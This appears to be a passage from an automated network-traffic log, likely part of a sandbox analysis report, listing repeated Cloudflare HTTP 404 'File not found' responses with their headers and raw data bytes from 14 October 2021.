Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:23 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5wgGIaVyqpazjweKVSLXwiCkN75Ifsmvy1yNZb2HaTGFvj97QAK7byh9rdPZijXBS8IE2ZBG%2FYRIB4fcQZc0542rQ1bDIXwKO%2FyT7rfH3BOzsIfhWyfBIdPcSEdN3h0udKSLVpVjCxXslaXSnf%2Bcj8Aw4JtpmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf50b8e24de8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:25 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUPKE8D4UGkHYeoSd0yWKGHpiVyKRj77CORXDe0%2F1O83cFqfjhqZ0VrDKDJl5PNFM1d7k7a%2BakFbs2fwMXUXRPnpAD93uQfrQNlF5%2B5FUNRmWTFz4Fi75GfzaL9mPeByBQ%2BOUK4b0qNxYwgtN4fwhqW64C7hPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf578ab14e5c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:26 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NBl2laSVW7g6vrcMW38%2F2YBxeOPQrkwxtPhBgARwSEgAQNN%2Fw9iGGS%2FMcVDd5bsPKDfZf7F34jWKWukgO%2BC6zW4jkS8RqojfmfBcKo9bpy3LJAKlcTfInQaxeHYOzrjAYApe5O2EWJUMAr1uyWTrEaztAHnaRg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf5eafe9695b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:27 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OvCReYL5kOGzCHk1X2inrDg3LE1il6%2B7FTgD%2FXIswLKX9fCBRgXz9DRTR%2BULHUkhSfhznG6alUky58mQbc1ir%2ByqnxuDkYKD854tu9UOoiYexIWXj8lJVJPVQ2nEQja6fVQg5wAHAZeKEplbfNmZMMqLBlJM6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf66ec32692b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:30 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Hk46wdoG1U27nz707h6QtW1GUw2h6o9OisNkyhB2aYUTsS7ahwfcM37s0X%2BXm8zCJMTqINkuUnoOUc6RiTwkeUHqopnJbQ82UpWA9CyU9N%2BqKVbZ2JX9RAD3Z5d9c3nY2pdXuQ2K39C%2BMU9nFo%2Bj20Dqe22SQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf795ca042e1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:31 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xk4891DLaBXXjT1FhSY5vGjPMlx7%2FPwKsYbmlt3n3G5MwqOiF37%2FMqhNAZ9k%2FwEIMsJstsiC5k0UvsMw0imxbeYrZlZTQ1lGsg9Eox%2BRhZh7Mbe51awkrb53qeX5Jtjag4OXYQUnQ2SLmWUAhH7J7El0v%2F1uGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf804c5d4eb0-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:32 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PsyKz23oumG1N2Qa6W82cL6U9NuCNhNUuC%2FZVgvvwW%2BDV3gzbbFfzB3%2BNtArLcKJk6RAdkcWIb70IWH9c1BU5tnjxYGlq1KaEkpgcFVk3A%2FjDdAOS0gYz6ayeBdJqQBA9VqH4EPLTxPN245tSgs%2BJ6qZbgIytw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf873cad5c62-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:33 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H68GrAIUZ61ik30eQPT7ieOnffpsCaIqd%2B20QY25W3jNlrWDPyTlhkKHRfJS%2FiUtwct9SjTEfhD8iO%2B5yucBGT673jWQTRVTfa6kc7%2Fx89CXhw5%2Fm91Iu3OgHm5JHlTRSAOWIMlJ6872pwxceJSRHYfcODJ2aQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf8e7a2f2b65-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:35 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZ0sVZ19FquxOnQnQ8eV27mBYy1WgM0CUPb1NNnWMJzxc3043xzagNkBokq638MVdi87wkRVwA%2FaDhBllVz6Wa7tU%2BXqwhXPidoHFsE7wvUTdAVBYElnVusQQa8dyaLYa2RuJ8MO2LY4BrfzJZWgJLGhDagHvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf9619e27025-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:36 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cfaTZhkdZ%2B4BJCg2NEEt3iB1wdphtOW7vYogkgF6ssnB0JtOYVEcfiVEntxnGT8GGYD49JE7n6oNLeWj%2BaC3dp6n%2FnvCW6Yfyv6vLBoDeaIyz7FL%2BFkuxcREOUryCFN7LVICmGTi487rSg3JKSZqNWUkm5jFTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf9cfa384a85-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:37 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yx4q2GcB87W4VIt%2F6Bl3361rtQSoUi34qsv3Q1MEZfb%2BSUNJrztSsb%2BJ14kBZzFEMs0Tkh%2F8iKsclQJnJlu7SyIBt6Rz6eoZ8nTufwUUBVTn4sWWS4kQt51roLWM4G0PcAOACqu4oY8Th1%2B801eD8ZrqSMLkmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfa408094e97-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:38 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Pn8lTUVtVtKkV%2B9%2FhI5pH%2Bbv3JxxkgBA0SYiWdJIlkIQKZcw5zH1I8kAF6QAJOIRQjkM%2BOmDifl0B6xVMTePviWGDxi0zLdm1s%2FnLGulx3kj4q8F2zNoVyQpgtSXW0TCRUbCOKrT9TH7mteyHIsbeqJURSgUUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfabfe766933-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:39 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fbYEyM1Gh6WdAzvjkUrxUJ61%2BI86%2FMQWYOt736TgF8PYXX4xRDCoMqDGqnuxaI5J8NZQWEAAFQmX57qs%2BjEX9BOBANnKvqJQwuiSDuZUH%2FmkItpnH6MouMDIgY94Ubkv2Xr%2FP6LV0udfFhbt0DzGN4dYvRJYjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfb2ffc45bdd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:41 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tnOYS6v1%2BDryLySE0XRA3DanDggqIU5lD1efwHzLdufMHOXHG4q7dfhWoqlzoX5wDgi%2BczRB82cB78sgINYZ70528recLHfPp2P6sSiGDKYiKmOnVIaMSw3%2FJ%2FTVZtL%2FZnQlEs8dl3y5rZsfxnVPclRPmHDLkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfbcfff06925-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:42 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0EH47MMNXBWoZhSTeJKDFH5ttH4eNOc7DIMbRM5RUcGlJfPGdlM2qgJ%2FydGTeU89PVVspTxJUD78%2FLsz4jje9NE8J9ra8L440XXrJYNDu3lHjX7Az2%2FQMSbcG0NHixWuQ8qg3I%2FvBmZH39V3W4%2BLjJC5wpkOjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfc43f923240-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:43 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=krWVnXC%2BdefgGbNlcpBvuV%2B%2FEt1AN8TvqNCkwdnHu1u%2B%2Br4NhUyvinuefOGVyWbc9ShnhxYhW4%2BuqcpJdGFs2cOx%2Bg6Ex6pVLOOMw3MGB8imhhNCOi5JQPVnEFzH54P2wj3uTDGZgD%2B%2BgOSe36UWuNVLFTWpSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfce38355bed-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:45 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CpHKxOLOrpPIM1PF5NEE6vUZ3l5dbYDOl6UNrbCahs5hxC4aJJGhGN7oKjrOL0BSNTAo1uQVbVx5SYG5UeeMMxOeU8B5DsuS3mvrPAdrCRib2ajEVOGtz7to8pV1YDKcBopo%2FKcmdVe3ptFDjf6kWXXiTMwHzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfd76c86440d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:48 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xX8MVuCGjS0FNM%2FvuL2BD8nyHgscINdYF2sTG5gdSsMS3%2F808sSrsFsd18a3PVjF22lX8c6mqEJFN4gRhXrpUEkmDty5RH6trK9n7XiwuMhOgsGG0JxWNKvSSmXgx%2F38h9tCGGDosMS%2FwDye9z6hmxb7OGqF0w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfe84d3e4309-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:49 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3nVDbQqzeq99VtQdxhWX%2Fj7fXtAJV7srTKCv221y2RZh2a%2F8IS0yw3Zf9GABw%2F42RW46cAvIOehRvvP4M6%2FyJSAId%2Bgjb24pBzUjcG3sOSc%2FJAPaXI%2FrScX7pLEjJO5mSc8ztul8%2Bxk3KF3VKTeg%2Fa5igJ67pw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debff26ef15c2c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:51 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sy0tXiUZGLf%2FShCOiRUnNRckJK1ccZE5lquOjWMUouZuuVvcp%2BfhB5GGR1S0BhIE6pVkDFG%2FzmcmHMOfWnDo6YPcj7m3%2FYYbTB4GxN%2BjA6S6jjPL6chZ1jihY6yWnxqgycQOlIXIPvuqEaE1VHcfl3z2NHMvrA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debffaaf320621-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:52 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0%2F0G%2FltPrkYLGxzRCt9VdfNUMtip3rLXsYuFpJSTw2Tm%2Bkk99WneQCuJnmMJyMyxB%2FadH9hc7Nck4D5MaWnJHgR8m%2BeuWRD%2BWW1k6AEiWmmZ9D3wy1JfLuw3Xnsjx%2F97L17z30dxppqVVpdcP7o%2BEMd9GCUKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0031f88c2c7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:53 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r0SNwUQXmpNoSyQjbUBF5l8GTY8SywVTmzZ8AkYzJWy0b1O3O5n7b1dHE%2BpDh78zb6iFJ%2BdNIyBnabgJCYCBp9qDa6TZYlhCr6htZEMFmSRyHaUU%2F5WZkBITRFMBZ70zlWfi%2BTeSLQBR3OnT37qPUC6HdB7R1g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec00acb8868e9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:54 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5iKke1AJBJjg1Y4VYs826dmfarUEhJ%2BRldRquW1kfSHN%2F9pyLtsyynuFr6yDn27OBJXeF7xvTdW%2Ft8i1FIp5x0Weuf1lZLtQZXeLjxSzbBGO%2FyFV1amXpr3qEg91BlnrsxMydhByRN7hHp%2FNzcUVzgokqELeaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0119f8505d0-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:56 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ZERCavJqd%2FSKMbfz%2FCdLS9YwGowXmP6tmsSmcJhamaT8Ait4OW44MSZPDPU0Da0xQWD1O7rujLd4vYbmYz9A17IY8%2BGwpvDcLDsDokZqYZuqyxlqEAsXlvosJbc66ZygTYhi55wxB4l2t2Jm5O0fXdSbA4yjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec01a8bea1f31-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:57 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O5KNJiSYA%2FFwVwmEIc9wb3cwwX%2FatGRb1JUO%2Bz%2BO1X6dOTVK5OasGDuojIDlalGExPnvGUgm4%2BBjy6wcTbge3HFAtucsxDcKdwQEvnp1sBeGdfQVSDQonetbCFSY%2BgvOrCkvkI7mREs82y4gLDOZB6jrrwpPJA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0238f384df4-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:59 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DM7UDqfrOC0u1TfBnQ6rtX30q18tMXbF5JIb91n%2BbGCB6ZdVbFXYS95wCnHdXiccXK3L6LtGQvYayuHRvdRXTsx%2Bp%2F8MP1IOTYSnqgQ1RzzD0YUpci6oZfH4e%2BVOk7%2BgeLA12NXL%2BrdcTTN7OA8MSANsnvfhKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec02c0d56695b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:00 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6pzxxxAx7m5C%2BvI0HV9vpq2v%2FMh%2FQtCUhiuQVfVDamOYlWTH%2Fi66M79yyl7xYeat0IDW%2FErpRaBlSviuH6N5w1T51LJh6ilhSkpq5iiAXlGSkcN%2F0RFH%2B4gKfqMyKqrLMrZ%2F9KQlOg0PnfcEYBS9mMuv2oXUEw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec034ea085c38-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
